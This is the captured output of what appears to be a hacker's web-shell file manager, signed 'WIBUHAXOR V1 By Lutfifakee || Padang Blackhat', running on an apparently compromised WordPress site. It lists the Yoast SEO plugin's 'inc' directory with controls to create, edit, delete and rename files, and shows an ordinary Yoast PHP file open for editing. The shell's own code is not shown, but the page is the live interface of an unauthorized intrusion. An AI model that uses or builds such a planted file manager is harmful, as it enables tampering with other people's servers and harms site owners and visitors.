-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
wordpress-seo
/
inc
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
exceptions
--
NONE
options
--
NONE
sitemaps
--
NONE
class-addon-manager.php
26.591KB
Edit File
Delete File
Rename
class-my-yoast-api-request.php
5.387KB
Edit File
Delete File
Rename
class-post-type.php
3.893KB
Edit File
Delete File
Rename
class-rewrite.php
7.579KB
Edit File
Delete File
Rename
class-upgrade-history.php
3.043KB
Edit File
Delete File
Rename
class-upgrade.php
55.293KB
Edit File
Delete File
Rename
class-wpseo-admin-bar-menu.php
26.966KB
Edit File
Delete File
Rename
class-wpseo-content-images.php
2.621KB
Edit File
Delete File
Rename
class-wpseo-custom-fields.php
1.726KB
Edit File
Delete File
Rename
class-wpseo-custom-taxonomies.php
1.591KB
Edit File
Delete File
Rename
class-wpseo-image-utils.php
15.091KB
Edit File
Delete File
Rename
class-wpseo-installation.php
1.173KB
Edit File
Delete File
Rename
class-wpseo-meta.php
34.169KB
Edit File
Delete File
Rename
class-wpseo-replace-vars.php
51.412KB
Edit File
Delete File
Rename
class-wpseo-replacement-variable.php
1.343KB
Edit File
Delete File
Rename
class-wpseo-shortlinker.php
1.105KB
Edit File
Delete File
Rename
class-wpseo-statistics.php
1.409KB
Edit File
Delete File
Rename
class-wpseo-utils.php
28.488KB
Edit File
Delete File
Rename
class-yoast-dynamic-rewrites.php
5.235KB
Edit File
Delete File
Rename
date-helper.php
1.711KB
Edit File
Delete File
Rename
interface-wpseo-wordpress-ajax-integration.php
0.287KB
Edit File
Delete File
Rename
interface-wpseo-wordpress-integration.php
0.34KB
Edit File
Delete File
Rename
language-utils.php
1.282KB
Edit File
Delete File
Rename
wpseo-functions-deprecated.php
0.066KB
Edit File
Delete File
Rename
wpseo-functions.php
9.002KB
Edit File
Delete File
Rename
wpseo-non-ajax-functions.php
1.556KB
Edit File
Delete File
Rename
<?php /** * WPSEO plugin file. * * @package WPSEO\Internals * @since 3.6 */ /** * This class checks if the wpseo option doesn't exists. In the case it doesn't it will set a property that is * accessible via a method to check if the installation is fresh. */ class WPSEO_Installation { /** * Checks if Yoast SEO is installed for the first time. */ public function __construct() { $is_first_install = $this->is_first_install(); if ( $is_first_install && WPSEO_Utils::is_api_available() ) { add_action( 'wpseo_activate', [ $this, 'set_first_install_options' ] ); } } /** * When the option doesn't exist, it should be a new install. * * @return bool */ private function is_first_install() { return ( get_option( 'wpseo' ) === false ); } /** * Sets the options on first install for showing the installation notice and disabling of the settings pages. * * @return void */ public function set_first_install_options() { $options = get_option( 'wpseo' ); $options['show_onboarding_notice'] = true; $options['first_activated_on'] = time(); $options['first_activated_by'] = get_current_user_id(); update_option( 'wpseo', $options ); } }
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat